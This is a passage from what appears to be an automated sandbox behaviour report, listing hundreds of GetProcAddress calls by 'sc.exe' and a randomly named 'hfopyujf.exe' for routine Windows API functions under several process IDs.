00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005960)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00006008)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00006008)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005972)\n \"sc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005972)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002240)\n \"hfopyujf.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 